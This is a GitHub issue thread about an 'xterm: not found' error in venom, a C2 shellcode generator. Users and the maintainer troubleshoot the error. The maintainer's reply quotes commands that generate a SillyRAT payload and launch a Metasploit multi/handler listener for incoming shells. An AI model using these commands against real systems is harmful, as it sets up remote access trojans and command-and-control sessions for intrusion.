r00t-3xp10it / venom

venom - C2 shellcode generator/compiler/handler
1.76k stars 593 forks source link

./venom.sh: 7636: xterm: not found #111

Open xSage6x opened 3 years ago

xSage6x commented 3 years ago

I’m having issues with venom. I completed the setup installation and everything. But when I go to venom and do all the steps for creating a payload, after selecting the shell code generator, it just says “xterm: not found” then it boots me back up to the startup menu again. Please help image ![Uploading image.jpg…]()

r00t-3xp10it commented 3 years ago

Tell me what categorie and payload number that you have try

About xterm read this issue: https://github.com/r00t-3xp10it/venom/issues/43


NOTE-TO-SELF

Replace xterm by gnome-terminal in next update!

gnome-terminal --title="SillyRAT - Generator Mode" --geometry=90x21 --wait -- sh -c "python3 server.py generate --address $lhost --port $lport --output $IPATH/output/$Drop.py --source && sleep 2" > /dev/null 2>&1

xterm -T " PAYLOAD MULTI-HANDLER " -geometry 110x23 -e "sudo msfconsole -x 'spool $IPATH/output/report.log; use exploit/multi/handler; set LHOST $lhost; set LPORT $lport; set PAYLOAD $paa; exploit'"
dinchaman commented 2 years ago

still it is booting back without giving shell code generator after doing gnome-terminal commands also

logm1lo commented 2 years ago

do "sudo apt install xterm"

zyoudadel commented 1 year ago

are you get soloution for this issue